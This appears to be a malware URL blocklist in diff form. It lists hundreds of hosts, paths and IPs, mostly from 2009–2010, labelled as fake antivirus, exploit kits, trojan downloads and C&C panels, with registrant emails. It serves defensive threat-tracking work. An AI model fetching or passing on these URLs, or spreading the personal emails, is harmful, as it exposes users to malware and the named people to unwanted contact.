+"2009/11/15_16:09","www.wildsap.com/?kkk=bleach-episodes-244","69.89.31.59","box259.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","www.ohiomm.com/?page=bleach-244-vosta","74.220.219.67","box467.bluehost.com.","redirects to Rogue if referer is a search engine","jarnold@knightridder.com","11798","0","US", +"2009/11/15_16:09","be-funk.com/?kkk=bleach-244-english-sub","69.89.18.20","box20.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","revistaelite.com/?topic=bleach-244-english-sub","69.89.22.116","box116.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","www.wrestlingexposed.com/faq.php?t=bleach-244-english-sub","67.20.108.63","67-20-108-63.bluehost.com.","redirects to Rogue if referer is a search engine","wrestlingexposed.com / whois@emailaddressprotection.com","11798","0","US", +"2009/11/15_16:09","revistaelite.com/?topic=bleach-244-raw","69.89.22.116","box116.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/16_21:00","santacruzsuspension.com/?j=bleach-episode-245","66.96.130.21","21.130.96.66.static.eigbox.net.","redirects to Rogue if referer is a search engine","Santa Cruz Suspension and Accessories / rdandolo@comcast.net","29873","0","US", +"2009/11/24_19:27","-","88.80.10.1/pp/anp.php","-","RFI","-","33837","0","SE", +"2009/12/02_20:32","www.sitepalace.com/w0rmreaper/NoVaC.jpeg","216.45.58.150","-","trojan","jason@jasonscott.com","29761","0","US", +"2009/12/04_19:56","www.doctor-alex.com/files/SetupDrAlex.exe","69.89.20.48","box48.bluehost.com.","Rogue","whois@bluehost.com","11798","0","US", +"2009/12/10_15:48","cznshuya.ivnet.ru/","81.20.97.13","hosting.ivnet.ru.","compromized site loads external script with exploits","Alexey.Vikhrev@vvf.centertelecom.ru","24699","0","RU", +"2009/12/10_15:48","www.tpt.edu.in/","76.163.253.1","-","compromized site loads external script with exploits","-","32392","0","US", +"2009/12/12_10:56","-","218.25.203.5/images/images/js.gif","-","trojan","-","4837","0","CN", +"2009/12/23_02:35","inlinea.co.uk","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","exploit","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2009/12/23_02:35","inlinea.co.uk/suspended.page/","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","exploit","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2009/12/23_02:35","inlinea.co.uk/adnep/simple.php","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","fake av","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2009/12/23_02:35","inlinea.co.uk/adnep/tahitian.php","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","fake av","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2014/01/22_22:22","downloads-whatsapp.com/whatsapp-for-samsung.php","91.218.229.16","h7.ihc.ru.","Android/Trojan.SMS.FakeInst","-","48172","0","RU", +"2010/02/01_11:14","websalesusa.com/ken","208.112.22.66","-","RFI","CvAP / psugarman@websalesusa.com","20021","0","US", +"2010/02/02_08:40","www.rempko.sk/kontakt.htm","213.81.152.60","wep.t-com.sk.","compromised site directs to exploits","-","6855","0","SK", +"2010/02/10_11:39","www.secondome.com/sora-margherita/","69.163.145.107","apache2-moon.suns.dreamhost.com.","obfuscated iframe directs to exploit kit","secondome.com@proxy.dreamhost.com","26347","0","US", +"2010/02/13_09:21","reishus.de/.sys/?action=fbgen&mode=s&age=193&a=-186345958&v=82&crc=669&ie=6.0.2900.2180","212.12.112.25","web-ve-gamma.domainmedia.net.","Koobface","hostmaster.no@spam.expressmedia.de","12595","0","DE", +"2010/02/13_09:21","sexzoznamka.eu/lightbox/js/r/files/tasks/AC","87.236.199.153","boom.barad.cz.","returns malware url base64 encoded","-","35592","0","CZ", +"2010/02/14_15:14","-","119.145.143.6/aspnet_client/system_web/update.exe","-","trojan Redosdru","-","4134","0","CN", +"2010/02/17_15:39","-","66.220.17.157/toolbar_uninstall.exe","157.17.220.66.in-addr.arpa","Trojan.Obfuscated.BX / Lop / Swizzor","-","6939","0","US", +"2010/02/17_15:39","-","89.28.13.212/in.php?s=89.28.13.214","89-28-13-212.starnet.md","redirects to fake av","-","31252","0","MD", +"2010/02/25_21:26","a.update.51edm.net/20100223/01.kdg?md5=ab2676ca2190bc21abcba6e5f5b3b2a7","222.222.204.68","-","trojan","ktone123@sohu.com","4134","0","CN", +"2010/02/26_16:28","-","77.245.61.232/offersfortoday/get_file.php","afleet15.amsnl.webair.com.","redirects to trojan","-","36057","0","NL", +"2010/02/26_16:30","-","77.245.61.232/offersfortoday/multi/28.exe","afleet15.amsnl.webair.com.","trojan","-","36057","0","NL", +"2010/03/09_12:04","bravetools.net/en/mytools.php","74.54.41.82","gator326.hostgator.com.","exploit kit","Amir Hossein Jadidi / domian@parandis.com","21844","0","US", +"2010/03/17_04:53","-","83.139.194.168/images/comprovanteEmail_Html.com","-","Trojan","-","33942","0","IT", +"2010/03/17_15:54","vette-porno.nl","213.132.197.60","webguru104.webguru.nl.","obfuscated iframe directs to exploit kit","-","24793","0","NL", +"2010/03/24_11:51","-","58.55.127.16:8080/files/image.jpg","-","Backdoor Koutodoor","-","4134","0","CN", +"2010/03/29_06:18","obkom.net.ua/bancodes/rotator.php?place=indexfoot","193.178.146.235","obkom.net.ua.","iframe directs to redirector/exploits","info@imena.com.ua 20051201","28907","0","UA", +"2010/04/01_16:14","wkmg.co.kr/bbs/lib/1.txt","218.38.243.71","-","RFI","lc1005@naver.com","17845","0","KR", +"2010/04/03_10:04","-","91.207.6.134/spm/page.php?id=1378328&tick=1378328&ver=100&smtp=ok&task=0","134.6.207.91.unknown.SteepHost.Net.","-","-","47142","0","CZ", +"2010/04/07_06:26","blacknite.eu/cracking/Pelite.EXE","89.234.64.135","web3.hosting.digiweb.ie.","trojan","-","31122","0","IE", +"2010/04/07_14:26","-","78.140.15.82/protod.exe","-","backdoor","-","31357","0","RU", +"2010/04/08_15:26","-","202.38.97.217/manual/readme.txt","-","trojan","-","4538","0","CN", +"2010/04/08_15:26","bargainracks.co.uk/img/common/1x2.gif","77.75.105.9","-","trojan","-","39326","0","GB", +"2010/04/10_09:07","-","62.75.152.79/MeinEigenerServer/index.php?p=Login","vs152079.vserver.de.","control panel of Warbot","-","8972","0","DE", +"2010/04/12_11:29","-","95.143.193.60/dir/gate.php?box=war&take=0&uid=pecwghrc","-","trojan Peerfit","-","49770","0","SE", +"2010/04/12_20:14","-","193.86.3.170/region/karneva2003-2/karneval2003-2.html","ns3.oku-zn.cz.","obfuscated iframe directs to exploit kit","-","2819","0","CZ", +"2010/04/14_05:32","-","78.140.15.82/bootstrap","-","Gootkit","-","31357","0","RU", +"2010/04/16_20:16","pokachi.net/","77.222.40.91","varna.sweb.ru.","compromised site directs to exploits","-","44112","0","RU", +"2010/04/16_20:16","pride-u-bike.com/2006/09/30/akkymtlator/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/2007/06/23/s-tolkacha/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/2007/07/30/doroga-smerti/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/byzapimoto/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/motorcycle/suzuki-motorcycle/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/motorcycle/vozdeniye-motorcycle/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/sell/honda-steed-400-1996/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/sell/honda-vfr400r-nc30/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","quotidiennokoue.com/","66.7.214.152","pass81.dizinc.com.","compromised site directs to exploits","-","33182","0","US", +"2010/04/16_20:16","quotidiennokoue.com/?cat=5","66.7.214.152","pass81.dizinc.com.","compromised site directs to exploits","-","33182","0","US", +"2010/04/16_20:16","quotidiennokoue.com/?p=558","66.7.214.152","pass81.dizinc.com.","compromised site directs to exploits","-","33182","0","US", +"2010/04/16_20:16","safety.amw.com/family/ask-john-walsh-how-can-i-tell-if-a-child-has-been-abused/","4.59.56.18","-","compromised site directs to exploits","-","3356","0","US", +"2010/04/16_20:16","safety.amw.com/home/stop-domestic-violence-before-it-starts/","4.59.56.18","-","compromised site directs to exploits","-","3356","0","US", +"2010/04/16_20:16","wmserver.net/sgcg/?page_id=5","217.30.180.48","virtual22.nebula.fi.","compromised site directs to exploits","-","29422","0","FI", +"2010/04/16_20:16","wp9.ru/","188.127.248.54","5.mirit.su.","compromised site directs to exploits","-","48172","0","RU", +"2010/04/16_20:16","www.sanseracingteam.com/wordpress/","85.10.140.251","wpc4811.host7x24.com.","compromised site directs to exploits","-","48185","0","FR", +"2010/04/16_20:16","www.sanseracingteam.com/wordpress/?p=128","85.10.140.251","wpc4811.host7x24.com.","compromised site directs to exploits","-","48185","0","FR", +"2010/04/16_20:16","www.sonnoli.com/?page_id=5","62.149.140.107","webx97.aruba.it.","compromised site directs to exploits","-","31034","0","IT", +"2010/04/16_20:16","www.stirparts.ru/","89.108.67.238","cp141.agava.net.","compromised site directs to exploits","-","43146","0","RU", +"2010/04/16_20:16","www.tiergestuetzt.de/","80.190.144.115","sv05.net-housting.de.","compromised site directs to exploits","-","15598","0","DE", +"2010/04/17_23:47","-","78.140.15.82/quu3aiVai7Lei6epha7azoYegah4da9za2rec8ahngoosu7tuneemoizee5vael5eBoazahHephaahohTa3eecoochaiseesheichoh7aikuz0uas8zeekiaChiayeVa/scripts/tasks.xml","-","Gootkit","-","31357","0","RU", +"2010/04/20_10:45","pic.starsarabian.com/","98.130.32.2","rev.opentransfer.com.2.32.130.98.in-addr.arpa.","obfuscated iframe directs to exploits","IX Webhosting / info@ixwebhosting.com","32392","0","US", +"2010/04/20_16:20","www.angolotesti.it/J/testi_canzoni_jovanotti_168/testo_canzone_chissa_se_stai_dormendo_9566.html","174.122.221.186","ba.dd.7aae.static.theplanet.com.","obfuscated iframe directs to exploits","-","21844","0","US", +"2010/04/25_06:54","w612.nb.host127-0-0-1.com/bins/int/kr3_znp.int?fxp=384bd820008ee37f030b3e65bca6e8a1a65beab33574f567a23b0a987ca83e6544e3e645","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/04/25_06:54","q28840.nb.host127-0-0-1.com/bins/int/tp_map16.int?fxp=5936289861f351e362768cf97e7b45e0648647f26c6d6750fb2298af91238cf9c815a461","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/04/27_06:45","w4988.nb.host127-0-0-1.com/bins/int/np_pkz.int?affid=NP_0104&fxp=85c26940bd074d9ebe8290842bca496331374b71c3b8806954f77f9","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/04/27_06:45","z32538.nb.host127-0-0-1.com/bins/int/np_pkz.int?affid=NP_0104&fxp=2ac11c971204a16811817c725e04d68a44f9d4987c472f66eb08d0","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/05/07_06:52","-","62.122.75.237/","-","Rogue AV","-","5577","0","UA", +"2010/05/08_11:02","-","116.127.121.27/~brownsoftdown/download/servprodect27.exe","-","trojan","-","9318","0","KR", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i16/o.php","-","malware calls home","-","196954","0","UA", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i16/s.php","-","malware calls home","-","196954","0","UA", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i5/s.php","-","malware calls home","-","196954","0","UA", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i5/l.php","-","malware calls home","-","196954","0","UA", +"2010/05/13_10:04","-","188.65.74.166","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.167","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.168","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.169","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.170","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","afa15.com.ne.kr/media/videoxxx.avi.exe","211.119.245.140","-","fake av","-","3786","0","KR", +"2010/05/15_21:10","-","193.105.207.21/ccc/dede.qwas","-","-","-","50793","0","CZ", +"2010/05/15_21:10","-","193.105.207.21/dede/gate.php","-","-","-","50793","0","CZ", +"2013/08/07_19:06","rsiuk.co.uk/cinch/index.html","78.129.255.46","-","Leads to exploit","Barrie Lynch / -","20860","0","GB", +"2013/08/07_19:06","-","54.248.126.242/ruggedly/copernican.js","ec2-54-248-126-242.ap-northeast-1.compute.amazonaws.com.","Leads to exploit","-","16509","0","US", +"2010/05/26_18:24","-","83.133.125.178/r.php?type=0","srv45.cyberhost.name.","returns malware url","-","13237","0","EU", +"2010/06/01_18:58","-","213.252.116.180:81/roundcubemail/bin/1.gif","213.252.116.180.clients.rmt.ru.","RFI","-","5523","0","RU", +"2010/06/30_19:51","-","72.18.206.103/nervoso/download01.rar","ns2.amigoxeternamente.com.","trojan Banker","-","26277","0","US", +"2010/06/30_19:51","-","72.18.206.103/nervoso/download02.rar","ns2.amigoxeternamente.com.","trojan Banker","-","26277","0","US", +"2010/06/30_19:51","-","72.18.206.103/nervoso/download03.rar","ns2.amigoxeternamente.com.","trojan Banker","-","26277","0","US", +"2010/07/10_07:57","fgawegwr.chez.com/images/1273471091.exe","212.27.63.127","perso127-g5.free.fr.","trojan TDSS","Owner hostmaster@proxad.net","12322","0","FR", +"2010/07/13_12:51","-","91.188.60.5/hit.php?v=44&app_type_id=1&wm_id=acc0044&u=d6c9b08c-89d3-46bf-b610-08c742b7ebf2&t=2","-","malware calls home","-","6851","0","LV", +"2010/07/14_18:02","montezuma.spb.ru/key/72548.htm","91.195.110.99","91-195-110-99.hmrtelecom.ru.","fake crack site directs to trojan","ru-ncc@nic.ru","43671","0","RU", +"2010/07/14_20:45","freeserials.ws/sn/64850.html","91.195.110.99","91-195-110-99.hmrtelecom.ru.","fake crack site directs to trojan","none / Use registrar whois listed below","43671","0","RU", +"2010/07/17_20:20","allxscan.tk/ddt/load.php?f=1&e=4","217.119.57.22","bvtk02.synserver.de.","trojan downloader","abuse@dot.tk","31100","0","DE", +"2010/07/17_20:53","-","193.105.240.59/optima/index.php?uid=080286&ver=6g%20XP","-","malware calls home, returns base64 encoded url list","-","43513","0","LV", +"2010/07/19_21:04","-","91.188.60.5/hit.php?v=45&app_type_id=1&wm_id=acc0049&u=28b6d4a0-f30b-43bc-8cc8-c466a4ca72bc&t=2","-","malware calls home","-","6851","0","LV", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/api.php","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/992.jar","-","Java exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/cbe.jar","-","Java exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/error.js.php","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/gogol.Familie.class","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/MyName","-","exploit","-","9318","0","KR", +"2010/07/22_14:56","-","91.212.226.33/qkl4Cix7f4XUCs8MTQ1fGRvd25sb2FkfA==18k.gif","-","backdoor SdBot","-","5577","0","CZ", +"2010/07/23_08:01","-","91.188.60.5/hit.php?v=46&app_type_id=1&wm_id=acc0047&u=6a397086-fc8c-4e4e-bd44-05f8f376ab0f&t=2","-","malware calls home","-","6851","0","LV", +"2010/07/23_08:01","-","91.188.60.5/l.php?wm_id=acc0047","-","trojan downloader","-","6851","0","LV", +"2010/07/24_11:27","-","188.65.74.161/wrath_ehgoihgwpigpehh.exe","-","trojan","-","42473","0","AT", +"2010/07/25_17:24","-","91.188.59.10/opapa.exe","-","trojan","-","6851","0","LV", +"2010/07/28_14:08","pornstarss.tk/ntk/index.php?ID=105828","217.119.57.22","bvtk02.synserver.de.","exploit kit","buse@dot.tk","31100","0","DE", +"2010/07/29_13:45","-","85.21.235.231/psd/index.html","85-21-235-231.dar-ekspo.corbina.ru.","obfuscated script / java downloader","-","8402","0","RU", +"2010/08/01_10:11","-","188.65.74.161/varag_sdfgkwlkgadfshn.exe","-","trojan","-","42473","0","AT", +"2010/08/10_09:17","-","69.50.221.190/l1/bb.php?v=200&id=554905388&b=9468674099&tm=3","-","Oficla/Sasfis C&C","-","18866","0","US", +"2010/08/11_14:26","-","193.104.146.12:443","-","malware calls home over SSL","-","50134","0","CZ", +"2010/08/11_19:28","-","188.65.74.161/netpoint_ghlaerggweqa.exe","-","fake av","-","42473","0","AT", +"2010/08/12_12:51","-","69.50.221.190/l1/bb.php?v=200&id=636608811&b=9468674099&tm=2","-","-","-","18866","0","US", +"2010/08/13_18:44","-","202.109.143.16:81/ma.exe","-","PWS:Win32/Frethog.gen!G","-","4134","0","CN", +"2010/08/18_14:45","-","188.65.74.161/archi_orweihaorgaigph.exe","-","trojan","-","42473","0","AT", +"2010/08/20_09:37","-","87.118.88.140/pizda/show.php","ns.server.leo-host.ru.","Siberia exploit pack","-","31103","0","DE", +"2010/08/20_09:37","-","87.118.88.140/pizda/stat.php","ns.server.leo-host.ru.","control panel of Siberia exploit pack","-","31103","0","DE", +"2010/08/20_09:37","-","87.118.88.140/pizda/exe.php?spl=HCP","ns.server.leo-host.ru.","trojan","-","31103","0","DE", +"2010/08/21_19:01","-","91.188.59.150/show.php?s=bc0915c6c2","-","Incognito exploit kit","-","6851","0","LV", +"2010/08/21_19:01","-","91.188.59.150/admin.php","-","control panel of Incognito exploit kit","-","6851","0","LV", +"2010/08/21_19:01","-","91.188.59.150/load.php?e=2","-","fake av","-","6851","0","LV", +"2010/08/22_08:38","helesouurusa.cjb.com/land/video.php?l=4:52&id=1&n=my_loli2&a=mike&path=./tmb/my_loli2/31.jpg&rat=./img/rating5.jpg&v=61545","216.194.70.11","redirect.cjb.net.","redirects to trojan TDSS","CJB Management, Inc. / cjb@cjbmanagement.com","13911","0","CA", +"2010/08/22_08:38","helesouurusa.cjb.com/land/?n=my_loli2&id=1","216.194.70.11","redirect.cjb.net.","redirects to trojan TDSS","CJB Management, Inc. / cjb@cjbmanagement.com","13911","0","CA", +"2010/08/23_20:18","-","69.50.221.196/x22/load/load.exe","-","fake av","-","18866","0","US", +"2010/08/23_20:18","-","69.50.221.196/x33/load/load.exe","-","trojan","-","18866","0","US", +"2010/08/23_20:18","-","69.50.221.196/x44/load/load.exe","-","fake av","-","18866","0","US", +"2010/08/23_20:18","-","69.50.221.196/x55/load/load.exe","-","fake av","-","18866","0","US", +"2010/08/26_16:20","-","91.188.59.10/exe/sweater.exe","-","fake av","-","6851","0","LV", +"2010/08/26_16:20","-","91.188.59.10/exe/dogma.exe","-","trojan TDSS","-","6851","0","LV", +"2010/08/26_16:20","-","91.188.59.10/report/log.php","-","malware calls home","-","6851","0","LV", +"2010/08/26_17:01","luwyou.com/photos.php","208.87.149.250","-","trojan Yimfoca","luwyou / martavalverde12@ymail.com","40634","0","US", +"2010/08/30_18:49","-","61.147.75.89/index.php?open=1&myid=14c7c6847c09807.44463926","-","malware calls home","-","23650","0","CN", +"2010/08/30_18:49","-","112.84.189.89/mks.exe","-","TrojanDownloader:Win32/Doneltart.gen","-","4837","0","CN", +"2010/09/05_12:09","-","208.79.232.46:8444/exemple.com/load.php?spl=mdac","host.hotmommagossip.com.","trojan","-","19066","0","US", +"2010/09/05_12:09","-","212.117.161.31/js/","ip-212-117-161-31.server.lu.","exploit kit","-","5577","0","LU", +"2010/09/05_12:09","-","212.117.161.31/js/fi_4.php","ip-212-117-161-31.server.lu.","trojan TDSS","-","5577","0","LU", +"2010/09/07_20:34","-","188.65.74.162/test_severyan_sdhkjwg.exe","-","trojan","-","42473","0","AT", +"2010/09/09_17:06","-","188.65.74.162/invisible_eorighroeig.exe","-","fake av","-","42473","0","AT", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/gbotout.exe","-","trojan","-","48587","0","UA", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/out.exe","-","trojan","-","48587","0","UA", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/out1.exe","-","trojan","-","48587","0","UA", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/pedoout.exe","-","trojan","-","48587","0","UA", +"2010/09/12_10:10","-","188.65.74.162/fuckemall_dfljgsdhfog.exe","-","fake av","-","42473","0","AT", +"2010/09/12_10:10","-","194.28.112.3/outlook.exe","-","trojan","-","48691","0","MD", +"2010/09/15_17:18","update.onescan.co.kr/setupa/onescansetup.exe","115.68.13.152","-","fake av","å : ijong1255@nate.com","38700","0","KR", +"2010/09/15_21:29","-","94.100.25.139/np/index.php","139.25.100.94.king-servers.com.","CRiMEPACK","-","35017","0","PL", +"2010/09/15_21:29","-","94.100.25.139/np/admin.php","139.25.100.94.king-servers.com.","control panel of CRiMEPACK","-","35017","0","PL", +"2010/09/15_21:29","-","94.100.25.139/np/load.php?spl=hcp&b=ff&o=xp&i=hcp","139.25.100.94.king-servers.com.","trojan Oficla/Sasfis","-","35017","0","PL", +"2010/09/16_18:37","-","89.248.111.226/page/contacts","-","exploit kit","-","45001","0","ES", +"2010/09/16_18:37","-","89.248.111.226/page/b6609413801fe046af0a9bd9dff148af.php?site=12&name=47942584"e=contacts&","-","trojan","-","45001","0","ES", +"2010/09/19_09:45","sudcom.org/tmp/source/index.php","81.31.145.112","da45.joomlahost.it.","control panel of Eleonore Exploits pack v1.4.1","contactprivacy.com / sudcom.org@contactprivacy.com","47242","0","IT", +"2010/09/19_09:45","sudcom.org/tmp/source/pdf.php","81.31.145.112","da45.joomlahost.it.","pdf exploit","contactprivacy.com / sudcom.org@contactprivacy.com","47242","0","IT", +"2010/09/22_19:04","-","178.17.163.108/ez/","178-17-163-108.static-host.net.","exploit kit","-","43289","0","MD", +"2010/09/22_19:04","-","178.17.163.108/ez/stats.php","178-17-163-108.static-host.net.","control panel of exploit kit","-","43289","0","MD", +"2010/09/22_19:04","-","178.17.163.108/ez/load.php?f=1&e=0","178-17-163-108.static-host.net.","trojan","-","43289","0","MD", +"2010/09/28_18:49","-","70.86.83.194/~unix/PLUGIN/Install-TvFlashPlayer.exe","server1.ddf.com.br.","trojan","-","21844","0","US", +"2010/10/06_07:08","-","188.65.74.163/vlx777_sdhgjklaogreah.exe","-","fake av","-","42473","0","AT", +"2010/10/06_20:13","-","178.63.2.21/www/delivery/ajs.php?zoneid=4&cb=52206126077","static.21.2.63.178.clients.your-server.de.","iframe directs to exploit kits","-","24940","0","DE", +"2010/10/07_07:10","scdsfdfgdr12.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/07_08:41","-","69.64.50.78/kmxqildtbnangvd.php","vds104.entdev.org.","Phoenix exploit kit","-","30083","0","US", +"2010/10/10_11:05","-","69.64.50.78/foj.php?i=15","vds104.entdev.org.","trojandownloader Vilsel","-","30083","0","US", +"2010/10/10_21:10","scaner-do.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/10/12_06:40","scaner-file.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/10/12_06:40","scaner-figy.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/16_06:28","ns2ns1.tk/test/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","exploit kit","abuse@dot.tk","32613","0","CA", +"2010/10/16_06:28","ns2ns1.tk/test/load.php?f=1&e=2","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","trojan","abuse@dot.tk","32613","0","CA", +"2010/10/18_09:54","-","83.133.122.54/r.php?type=0","srv243.cyberhost.name.","return malware url","-","13237","0","EU", +"2010/10/19_19:22","-","195.226.197.49/spl_6/bn8.php?i=15","-","trojan","-","51303","0","UA", +"2010/10/22_06:27","-","109.196.143.135/outlook.exe","-","trojan","-","39150","0","UA", +"2010/10/22_22:17","scaner-or.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/23_14:38","-","188.65.74.163/cash2_rwhoajdtyjtyysd.exe","-","fake av","-","42473","0","AT", +"2010/10/26_18:45","-","195.226.197.50/spl_3/dzf.php?i=15","-","trojan","-","51303","0","UA", +"2010/10/26_18:45","exsexytop.tk/www/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","exploit kit","abuse@dot.tk","32613","0","CA", +"2010/10/26_18:45","exsexytop.tk/www/load.php?f=1&e=2","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/10/28_17:28","-","109.196.143.133/1.exe","-","trojan Bredolab","-","39150","0","UA", +"2010/10/28_17:28","-","109.196.143.133/bm/","-","Bredolab C&C","-","39150","0","UA", +"2010/10/29_11:24","scaner-sboom.tk/go/?afid=96","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/29_20:42","scaner-sbite.tk/go/?afid=","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/30_18:23","scaner-tfeed.tk/go/?afid=96","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/01_20:08","linkforme.tk/www1/load.php?f=1&e=2","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/01_20:08","linkforme.tk/www1/index.php","217.119.57.22","bvtk02.synserver.de.","Zombie exploitation kit","abuse@dot.tk","31100","0","DE", +"2010/11/02_10:15","scaner-tgame.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/02_13:07","scaner-sdee.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","-","32613","0","CA", +"2010/11/05_05:08","web-fill.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/06_11:29","internet-bb.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/06_22:45","textsex.tk/str/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","Zombie exploitation kit","abuse@dot.tk","32613","0","CA", +"2010/11/06_22:45","textsex.tk/str/load.php?f=1&e=4","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","trojan","abuse@dot.tk","32613","0","CA", +"2010/11/07_10:30","-","92.60.177.235/iza.php?i=15","grusha-92-60-177-235.hostinghutor.com.","trojan downloader","-","15772","0","UA", +"2010/11/09_19:19","-","193.178.172.60/1.exe","-","anti Trusteer Rapport trojan","-","20564","0","UA", +"2010/11/09_19:33","-","195.226.197.50/spl_4/xt.php?i=15","-","trojan","-","51303","0","UA", +"2010/11/10_18:37","live-dir.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/12_07:47","-","91.217.249.160/KILL.exe","-","trojan","-","51554","0","UA", +"2010/11/12_18:17","-","69.64.63.220/ar.php?i=15","balder038.server4you.net.","trojan Vilsel","-","30083","0","US", +"2010/11/12_18:17","mbrdot.tk/123/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","Zombie exploitation kit","abuse@dot.tk","32613","0","CA", +"2010/11/12_18:17","mbrdot.tk/123/load.php?f=1&e=6","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","trojan","abuse@dot.tk","32613","0","CA", +"2010/11/12_18:17","-","69.50.213.106/1/bqe.php?i=15","-","trojan","-","18866","0","US", +"2010/11/13_09:52","www.zyxyfy.com/images/ner.html","61.178.85.177","vip.lz118114.cn.","exploit","460243714@qq.com","4134","0","CN", +"2010/11/13_09:52","-","188.95.159.100/phpbb/image2/cp.php?i=15","-","trojan Oficla/Sasfis","-","51306","0","UA", +"2010/11/13_14:59","-","193.104.146.77/f1_heiught3o2iryhe/2uiew__t/zxconfig.bin","-","-","-","50134","0","CZ", +"2010/11/13_14:59","-","193.104.146.77/f1_heiught3o2iryhe/2uiew__t/up1/bot_up1_144.exe","-","-","-","50134","0","CZ", +"2010/11/14_18:06","-","91.217.162.141/adult/bq.php?i=15","-","trojan downloader","-","51441","0","UA", +"2010/11/14_22:12","sexyster.tk/lo/index.php","217.119.57.22","bvtk02.synserver.de.","Zombie exploitation kit","abuse@dot.tk","31100","0","DE", +"2010/11/14_22:12","sexyster.tk/lo/load.php?f=1&e=6","217.119.57.22","bvtk02.synserver.de.","trojan downloader","abuse@dot.tk","31100","0","DE", 